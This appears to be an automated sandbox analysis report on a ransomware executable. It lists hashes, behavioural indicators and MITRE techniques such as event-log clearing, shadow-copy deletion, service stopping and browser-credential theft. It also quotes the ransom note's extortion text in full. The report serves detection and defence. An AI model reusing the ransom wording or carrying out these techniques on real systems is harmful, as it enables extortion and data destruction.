de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806

Analysis

max time kernel
96s
max time network
126s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
01/01/2024, 15:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
Size

4.8MB
MD5

14888882bcf01c20a4a45bb9aa2b35f7
SHA1

50915c9c2855987e1191bbd2c510e067150b2a0f
SHA256

de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806
SHA512

c7ae29fddc996e4172672d8e28466f23e3afdbd458345679b5895b1d94e5cdd8120e51480837929b08d1373690aadecb601b7b0dc08ad47b36338c621a2d7436
SSDEEP

49152:vLiH3r02PBZrb/T5vO90dL3BmAFd4A64nsfJF4QWjmy25yr5nBFwLYgN4Ew5Ew1e:G3BlGy2CGyEkVHBhfwjPTBL5TJhLRp

Score

10^/10

evasion ransomware spyware stealer

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT

Ransom Note

Dear Management We inform you that your network has undergone a penetration test, during which we encrypted your files and downloaded more than 100 GB of your data (most from your PD), including: Accounting Confidential documents Personal data Copy of some mailboxes Important! Do not try to decrypt the files yourself or using third-party utilities. The only program that can decrypt them is our decryptor, which you can request from the contacts below. Any other program will only damage files in such a way that it will be impossible to restore them. You can get all the necessary evidence, discuss with us possible solutions to this problem and request a decryptor by using the contacts below. Please be advised that if we don't receive a response from you within 3 days, we reserve the right to publish files to the public. Contact us: [email protected] or [email protected]

Emails

[email protected]

Signatures

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
3408	Process not Found
2888	Process not Found
3256	Process not Found
724	Process not Found
1632	Process not Found
612	Process not Found
3844	Process not Found
2204	Process not Found
2116	Process not Found
2644	Process not Found
1032	Process not Found
608	Process not Found
3132	Process not Found
2684	Process not Found
1248	Process not Found
880	Process not Found
3312	Process not Found
216	Process not Found
2280	Process not Found
3468	Process not Found
280	Process not Found
2888	Process not Found
2408	Process not Found
720	Process not Found
2780	Process not Found
812	Process not Found
2288	Process not Found
280	wevtutil.exe
2372	Process not Found
1968	Process not Found
2200	Process not Found
2512	Process not Found
1036	Process not Found
600	Process not Found
1512	Process not Found
852	Process not Found
1520	Process not Found
2560	Process not Found
2440	Process not Found
3840	Process not Found
1368	wevtutil.exe
2788	Process not Found
2888	Process not Found
1816	Process not Found
3252	Process not Found
2016	wevtutil.exe
2180	wevtutil.exe
2408	Process not Found
156	Process not Found
3560	Process not Found
1932	wevtutil.exe
1536	Process not Found
1512	Process not Found
2628	Process not Found
3900	Process not Found
720	Process not Found
332	Process not Found
2068	Process not Found
2160	Process not Found
2356	Process not Found
3368	Process not Found
3972	Process not Found
788	Process not Found
2644	Process not Found

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 2 IoCs

description	ioc	Process
File created	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	wevtutil.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	wevtutil.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	wevtutil.exe
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	Process not Found
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	Process not Found

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14883_.GIF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File created	\??\c:\Program Files\Microsoft Games\Minesweeper\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMSS.ICO.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_SelectionSubpicture.png	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0185604.WMF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01472_.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0297551.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15277_.GIF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLBAR.INF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21310_.GIF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSHY7ES.LEX.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\107.accdt	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File created	\??\c:\Program Files\Microsoft Games\Mahjong\ja-JP\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-previous-static.png	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Solstice.eftx	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234657.WMF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\attention.gif	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105328.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46F.GIF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Microsoft Games\Multiplayer\Spades\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\fa.pak.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE01661_.WMF	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Address.accft	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02141_.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Document Themes 14\Metro.thmx.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\bckgRes.dll.mui	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099195.GIF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00402_.WMF.tiywepxb	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\locale\fr\HOW TO RESTORE YOUR TIYWEPXB FILES.TXT	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1296	Process not Found
1836	Process not Found
3784	Process not Found
1972	Process not Found
1536	Process not Found
1540	Process not Found
2728	Process not Found
3188	Process not Found
1504	Process not Found
2044	Process not Found
1876	Process not Found
1728	Process not Found
304	Process not Found
1936	Process not Found
1764	Process not Found
2872	Process not Found
2432	Process not Found
1368	Process not Found
3932	Process not Found
2280	Process not Found
3284	Process not Found
2120	Process not Found
1736	Process not Found
324	Process not Found
3048	Process not Found
2016	Process not Found
1600	Process not Found
3680	Process not Found
3536	Process not Found
1388	Process not Found
852	Process not Found
2240	Process not Found
544	Process not Found
996	Process not Found
2160	Process not Found
1232	Process not Found
2992	Process not Found
2100	Process not Found
4020	Process not Found
3428	Process not Found
3388	Process not Found
1416	Process not Found
1096	Process not Found
2816	Process not Found
1148	Process not Found
692	Process not Found
3476	Process not Found
1772	Process not Found
3496	Process not Found
2384	Process not Found
2524	Process not Found
2216	Process not Found
1264	Process not Found
1372	Process not Found
2608	Process not Found
2548	Process not Found
2180	Process not Found
3244	Process not Found
2828	Process not Found
2356	Process not Found
3464	Process not Found
4040	Process not Found
2180	Process not Found
1296	Process not Found

Delays execution with timeout.exe 26 IoCs

evasion

pid	Process
1832	Process not Found
3136	Process not Found
2704	timeout.exe
2540	Process not Found
2720	Process not Found
1764	Process not Found
2772	Process not Found
2768	Process not Found
1728	Process not Found
3088	Process not Found
3152	Process not Found
3068	Process not Found
1104	Process not Found
3076	Process not Found
1984	timeout.exe
2964	Process not Found
2596	Process not Found
332	Process not Found
2864	Process not Found
1944	Process not Found
968	timeout.exe
2596	timeout.exe
2832	timeout.exe
3192	Process not Found
860	Process not Found
1536	Process not Found

Interacts with shadow copies 2 TTPs 64 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3888	Process not Found
3752	Process not Found
3720	Process not Found
3700	Process not Found
952	Process not Found
952	Process not Found
2228	Process not Found
1960	Process not Found
3432	Process not Found
1076	Process not Found
2652	Process not Found
1088	Process not Found
2204	Process not Found
3696	Process not Found
1416	Process not Found
1532	vssadmin.exe
2560	Process not Found
4092	Process not Found
1952	Process not Found
2844	Process not Found
2836	Process not Found
3868	Process not Found
708	vssadmin.exe
1212	vssadmin.exe
224	Process not Found
1212	Process not Found
3320	Process not Found
2160	vssadmin.exe
2696	vssadmin.exe
2464	Process not Found
2616	Process not Found
1076	Process not Found
1832	Process not Found
2888	Process not Found
1820	vssadmin.exe
2548	Process not Found
2160	Process not Found
2712	Process not Found
1544	vssadmin.exe
2384	Process not Found
1880	Process not Found
3708	Process not Found
3900	Process not Found
4060	Process not Found
1728	Process not Found
3624	Process not Found
3724	Process not Found
1076	Process not Found
3484	Process not Found
2312	Process not Found
2136	Process not Found
3724	Process not Found
4044	Process not Found
2156	Process not Found
1804	Process not Found
3820	Process not Found
2696	Process not Found
2884	Process not Found
2548	Process not Found
2572	Process not Found
2284	Process not Found
2260	vssadmin.exe
796	Process not Found
2200	Process not Found

Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs

pid	Process
1948	vssadmin.exe
2500	vssadmin.exe
2728	vssadmin.exe
2744	vssadmin.exe
1968	vssadmin.exe
788	vssadmin.exe
2504	vssadmin.exe
2432	vssadmin.exe
1820	vssadmin.exe
2592	vssadmin.exe
2160	vssadmin.exe
1872	vssadmin.exe
2652	vssadmin.exe
2816	vssadmin.exe
2772	vssadmin.exe
2716	vssadmin.exe
2652	vssadmin.exe
1952	wevtutil.exe
1080	wevtutil.exe
1232	Process not Found
1032	vssadmin.exe
2892	Process not Found
2132	Process not Found
2384	vssadmin.exe
1864	Process not Found
240	Process not Found
3068	Process not Found
2472	Process not Found
1660	Process not Found
2572	Process not Found
2756	Process not Found
1584	Process not Found
996	Process not Found
2780	Process not Found
952	Process not Found
2624	Process not Found
2440	Process not Found
2068	Process not Found
880	Process not Found
956	Process not Found
1808	Process not Found
224	Process not Found
2016	Process not Found
2120	Process not Found
2780	Process not Found
1544	Process not Found
2372	Process not Found
2436	Process not Found
1684	Process not Found
1448	Process not Found
1536	Process not Found
1960	Process not Found
1876	Process not Found
2788	Process not Found
2696	Process not Found
1308	Process not Found
224	Process not Found
2776	Process not Found
2312	Process not Found
2696	Process not Found
2228	Process not Found
228	Process not Found
2444	Process not Found
724	Process not Found

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2996	de10b8454ebb363ab1469cebbd9898b2df591101806aedd9aab0b8b16139c806.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	948	vssvc.exe
Token: SeRestorePrivilege	948	vssvc.exe
Token: SeAuditPrivilege	948	vssvc.exe
Token: SeIncBasePriorityPrivilege	2656	taskeng.exe
Token: SeSecurityPrivilege	1456	wevtutil.exe
Token: SeBackupPrivilege	1456	wevtutil.exe
Token: SeSecurityPrivilege	1212	wevtutil.exe
Token: SeBackupPrivilege	1212	wevtutil.exe
Token: SeSecurityPrivilege	2820	wevtutil.exe
Token: SeBackupPrivilege	2820	wevtutil.exe
Token: SeSecurityPrivilege	1336	wevtutil.exe
Token: SeBackupPrivilege	1336	wevtutil.exe
Token: SeSecurityPrivilege	1644	wevtutil.exe
Token: SeBackupPrivilege	1644	wevtutil.exe
Token: SeSecurityPrivilege	2152	wevtutil.exe
Token: SeBackupPrivilege	2152	wevtutil.exe
Token: SeSecurityPrivilege	2120	wevtutil.exe
Token: SeBackupPrivilege	2120	wevtutil.exe
Token: SeSecurityPrivilege	648	wevtutil.exe
Token: SeBackupPrivilege	648	wevtutil.exe
Token: SeSecurityPrivilege	2888	wevtutil.exe
Token: SeBackupPrivilege	2888	wevtutil.exe
Token: SeSecurityPrivilege	1228	wevtutil.exe
Token: SeBackupPrivilege	1228	wevtutil.exe
Token: SeSecurityPrivilege	1248	wevtutil.exe
Token: SeBackupPrivilege	1248	wevtutil.exe
Token: SeSecurityPrivilege	1836	wevtutil.exe
Token: SeBackupPrivilege	1836	wevtutil.exe
Token: SeSecurityPrivilege	2160	wevtutil.exe
Token: SeBackupPrivilege	2160	wevtutil.exe
Token: SeSecurityPrivilege	1640	wevtutil.exe
Token: SeBackupPrivilege	1640	wevtutil.exe
Token: SeSecurityPrivilege	1932	wevtutil.exe
Token: SeBackupPrivilege	1932	wevtutil.exe
Token: SeSecurityPrivilege	1672	wevtutil.exe
Token: SeBackupPrivilege	1672	wevtutil.exe
Token: SeSecurityPrivilege	2196	wevtutil.exe
Token: SeBackupPrivilege	2196	wevtutil.exe
Token: SeSecurityPrivilege	240	wevtutil.exe
Token: SeBackupPrivilege	240	wevtutil.exe
Token: SeSecurityPrivilege	2472	wevtutil.exe
Token: SeBackupPrivilege	2472	wevtutil.exe
Token: SeSecurityPrivilege	3024	wevtutil.exe
Token: SeBackupPrivilege	3024	wevtutil.exe
Token: SeSecurityPrivilege	920	wevtutil.exe
Token: SeBackupPrivilege	920	wevtutil.exe
Token: SeSecurityPrivilege	2756	wevtutil.exe
Token: SeBackupPrivilege	2756	wevtutil.exe
Token: SeSecurityPrivilege	2220	wevtutil.exe
Token: SeBackupPrivilege	2220	wevtutil.exe
Token: SeSecurityPrivilege	1512	wevtutil.exe
Token: SeBackupPrivilege	1512	wevtutil.exe
Token: SeSecurityPrivilege	2400	wevtutil.exe
Token: SeBackupPrivilege	2400	wevtutil.exe
Token: SeSecurityPrivilege	1468	wevtutil.exe
Token: SeBackupPrivilege	1468	wevtutil.exe
Token: SeSecurityPrivilege	724	wevtutil.exe
Token: SeBackupPrivilege	724	wevtutil.exe
Token: SeSecurityPrivilege	852	wevtutil.exe
Token: SeBackupPrivilege	852	wevtutil.exe
Token: SeSecurityPrivilege	2132	wevtutil.exe
Token: SeBackupPrivilege	2132	wevtutil.exe
Token: SeSecurityPrivilege	1088	wevtutil.exe
Token: SeBackupPrivilege	1088	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 2492	2708	taskeng.exe	31
PID 2708 wrote to memory of 2492	2708	taskeng.exe	31
PID 2708 wrote to memory of 2492	2708	taskeng.exe	31
PID 2492 wrote to memory of 780	2492	cmd.exe	33
PID 2492 wrote to memory of 780	2492	cmd.exe	33
PID 2492 wrote to memory of 780	2492	cmd.exe	33
PID 2492 wrote to memory of 1984	2492	cmd.exe	35
PID 2492 wrote to memory of 1984	2492	cmd.exe	35
PID 2492 wrote to memory of 1984	2492	cmd.exe	35
PID 2492 wrote to memory of 2136	2492	cmd.exe	37
PID 2492 wrote to memory of 2136	2492	cmd.exe	37
PID 2492 wrote to memory of 2136	2492	cmd.exe	37
PID 2656 wrote to memory of 2440	2656	taskeng.exe	38
PID 2656 wrote to memory of 2440	2656	taskeng.exe	38
PID 2656 wrote to memory of 2440	2656	taskeng.exe	38
PID 2440 wrote to memory of 2200	2440	cmd.exe	40
PID 2440 wrote to memory of 2200	2440	cmd.exe	40
PID 2440 wrote to memory of 2200	2440	cmd.exe	40
PID 2440 wrote to memory of 968	2440	cmd.exe	41
PID 2440 wrote to memory of 968	2440	cmd.exe	41
PID 2440 wrote to memory of 968	2440	cmd.exe	41
PID 2492 wrote to memory of 1812	2492	cmd.exe	43
PID 2492 wrote to memory of 1812	2492	cmd.exe	43
PID 2492 wrote to memory of 1812	2492	cmd.exe	43
PID 2492 wrote to memory of 1948	2492	cmd.exe	44
